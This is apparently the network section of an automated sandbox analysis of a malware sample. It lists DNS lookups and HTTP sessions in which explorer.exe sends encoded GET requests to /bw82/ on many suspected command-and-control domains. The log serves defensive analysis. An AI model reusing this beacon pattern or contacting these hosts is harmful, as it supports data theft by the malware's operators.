Feb 23, 2021 09:00:28.246241093 CET | 192.168.2.3 | 8.8.8.8 | d03b | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 09:00:26.176038027 CET | 192.168.2.3 | 8.8.8.8 | 0x4508 | Standard query (0) | www.fcoins.club | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:27.186381102 CET | 192.168.2.3 | 8.8.8.8 | 0x4508 | Standard query (0) | www.fcoins.club | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:28.202013016 CET | 192.168.2.3 | 8.8.8.8 | 0x4508 | Standard query (0) | www.fcoins.club | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:33.254621983 CET | 192.168.2.3 | 8.8.8.8 | 0xae5d | Standard query (0) | www.h2oturkiye.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:38.567380905 CET | 192.168.2.3 | 8.8.8.8 | 0x8c97 | Standard query (0) | www.ramjamdee.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:43.862653017 CET | 192.168.2.3 | 8.8.8.8 | 0x23e2 | Standard query (0) | www.rizrvd.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:49.115926027 CET | 192.168.2.3 | 8.8.8.8 | 0xaf8d | Standard query (0) | www.gdsjgf.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:54.395446062 CET | 192.168.2.3 | 8.8.8.8 | 0xb35a | Standard query (0) | www.climaxnovels.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:59.691766024 CET | 192.168.2.3 | 8.8.8.8 | 0xb202 | Standard query (0) | www.thebabyfriendly.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:05.616384029 CET | 192.168.2.3 | 8.8.8.8 | 0xce86 | Standard query (0) | www.chrisbubser.digital | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:10.710935116 CET | 192.168.2.3 | 8.8.8.8 | 0x2d31 | Standard query (0) | www.wellnesssensation.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:16.014178991 CET | 192.168.2.3 | 8.8.8.8 | 0x886b | Standard query (0) | www.gallerybrows.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:21.282691956 CET | 192.168.2.3 | 8.8.8.8 | 0x3500 | Standard query (0) | www.yjpps.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:26.991563082 CET | 192.168.2.3 | 8.8.8.8 | 0x13f5 | Standard query (0) | www.usmedicarenow.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:32.432291031 CET | 192.168.2.3 | 8.8.8.8 | 0x2ed9 | Standard query (0) | www.activagebenefits.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 09:00:28.240843058 CET | 8.8.8.8 | 192.168.2.3 | 0x4508 | Name error (3) | www.fcoins.club | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:28.246145964 CET | 8.8.8.8 | 192.168.2.3 | 0x4508 | Name error (3) | www.fcoins.club | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:28.262003899 CET | 8.8.8.8 | 192.168.2.3 | 0x4508 | Name error (3) | www.fcoins.club | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:33.352252007 CET | 8.8.8.8 | 192.168.2.3 | 0xae5d | No error (0) | www.h2oturkiye.com | h2oturkiye.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:00:33.352252007 CET | 8.8.8.8 | 192.168.2.3 | 0xae5d | No error (0) | h2oturkiye.com |  | 94.73.146.42 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:38.631567001 CET | 8.8.8.8 | 192.168.2.3 | 0x8c97 | No error (0) | www.ramjamdee.com | ramjamdee.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:00:38.631567001 CET | 8.8.8.8 | 192.168.2.3 | 0x8c97 | No error (0) | ramjamdee.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:43.921757936 CET | 8.8.8.8 | 192.168.2.3 | 0x23e2 | No error (0) | www.rizrvd.com | rizrvd.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:00:43.921757936 CET | 8.8.8.8 | 192.168.2.3 | 0x23e2 | No error (0) | rizrvd.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:49.198060989 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8d | No error (0) | www.gdsjgf.com | gdsjgf.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:00:49.198060989 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8d | No error (0) | gdsjgf.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:54.460644007 CET | 8.8.8.8 | 192.168.2.3 | 0xb35a | No error (0) | www.climaxnovels.com | climaxnovels.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:00:54.460644007 CET | 8.8.8.8 | 192.168.2.3 | 0xb35a | No error (0) | climaxnovels.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:00:59.902288914 CET | 8.8.8.8 | 192.168.2.3 | 0xb202 | No error (0) | www.thebabyfriendly.com |  | 154.80.226.18 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:05.689476967 CET | 8.8.8.8 | 192.168.2.3 | 0xce86 | Name error (3) | www.chrisbubser.digital | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:10.869110107 CET | 8.8.8.8 | 192.168.2.3 | 0x2d31 | No error (0) | www.wellnesssensation.com |  | 52.128.23.153 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:16.085098028 CET | 8.8.8.8 | 192.168.2.3 | 0x886b | No error (0) | www.gallerybrows.com | gallerybrows.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:01:16.085098028 CET | 8.8.8.8 | 192.168.2.3 | 0x886b | No error (0) | gallerybrows.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:21.344999075 CET | 8.8.8.8 | 192.168.2.3 | 0x3500 | No error (0) | www.yjpps.com |  | 0.0.0.0 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:27.056251049 CET | 8.8.8.8 | 192.168.2.3 | 0x13f5 | No error (0) | www.usmedicarenow.com | ext-sq.squarespace.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:01:27.056251049 CET | 8.8.8.8 | 192.168.2.3 | 0x13f5 | No error (0) | ext-sq.squarespace.com |  | 198.185.159.144 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:27.056251049 CET | 8.8.8.8 | 192.168.2.3 | 0x13f5 | No error (0) | ext-sq.squarespace.com |  | 198.49.23.145 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:27.056251049 CET | 8.8.8.8 | 192.168.2.3 | 0x13f5 | No error (0) | ext-sq.squarespace.com |  | 198.185.159.145 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:27.056251049 CET | 8.8.8.8 | 192.168.2.3 | 0x13f5 | No error (0) | ext-sq.squarespace.com |  | 198.49.23.144 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:01:32.493457079 CET | 8.8.8.8 | 192.168.2.3 | 0x2ed9 | No error (0) | www.activagebenefits.net | activagebenefits.net |  | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:01:32.493457079 CET | 8.8.8.8 | 192.168.2.3 | 0x2ed9 | No error (0) | activagebenefits.net |  | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.h2oturkiye.com
• www.ramjamdee.com
• www.rizrvd.com
• www.gdsjgf.com
• www.climaxnovels.com
• www.thebabyfriendly.com
• www.wellnesssensation.com
• www.gallerybrows.com
• www.usmedicarenow.com
• www.activagebenefits.net

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49724 | 94.73.146.42 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:00:33.481127977 CET | 1237 | OUT | GET /bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip HTTP/1.1
Host: www.h2oturkiye.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:00:33.554917097 CET | 1238 | IN | HTTP/1.1 404 Not Found
Connection: close
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 1237
Date: Tue, 23 Feb 2021 08:00:33 GMT
Server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 
64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised tha


                                                                        Session ID:1
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49731
                                                                        Destination IP:34.102.136.180
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:00:38.674968004 CET
                                                                        kBytes transferred:1550
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO HTTP/1.1
                                                                        Host: www.ramjamdee.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:00:38.814054966 CET
                                                                        kBytes transferred:1554
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:38 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b8-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID:2
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49737
                                                                        Destination IP:34.102.136.180
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:00:43.964195013 CET
                                                                        kBytes transferred:2168
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.rizrvd.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:00:44.103739977 CET
                                                                        kBytes transferred:2168
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:44 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b8-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID:3
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49738
                                                                        Destination IP:34.102.136.180
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:00:49.240714073 CET
                                                                        kBytes transferred:2172
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY HTTP/1.1
                                                                        Host: www.gdsjgf.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:00:49.379719019 CET
                                                                        kBytes transferred:2173
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:49 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603153c4-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID:4
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49744
                                                                        Destination IP:34.102.136.180
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:00:54.503062010 CET
                                                                        kBytes transferred:6106
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.climaxnovels.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:00:54.643258095 CET
                                                                        kBytes transferred:6107
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b9-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID:5
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49745
                                                                        Destination IP:154.80.226.18
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:01:00.252922058 CET
                                                                        kBytes transferred:6109
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl HTTP/1.1
                                                                        Host: www.thebabyfriendly.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:01:00.606403112 CET
                                                                        kBytes transferred:6109
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 08:01:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1.0


                                                                        Session ID:6
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49746
                                                                        Destination IP:52.128.23.153
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:01:10.922751904 CET
                                                                        kBytes transferred:6110
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj HTTP/1.1
                                                                        Host: www.wellnesssensation.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:01:10.973952055 CET
                                                                        kBytes transferred:6111
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 463
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 08:01:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 8915
                                                                        Connection: close
                                                                        ETag: "5e52d3c2-22d3"
                                                                        X-DIS-Request-ID: 8829058ea78309a76b89162ecd6786d9
                                                                        Set-Cookie: dis-remote-addr=84.17.52.38
                                                                        Set-Cookie: dis-timestamp=2021-02-23T00:01:10-08:00
                                                                        Set-Cookie: dis-request-id=8829058ea78309a76b89162ecd6786d9
                                                                        X-Frame-Options: sameorigin


                                                                        Session ID:7
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49747
                                                                        Destination IP:34.102.136.180
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:01:16.127204895 CET
                                                                        kBytes transferred:6121
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.gallerybrows.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:01:16.266371012 CET
                                                                        kBytes transferred:6121
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:01:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6031584e-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
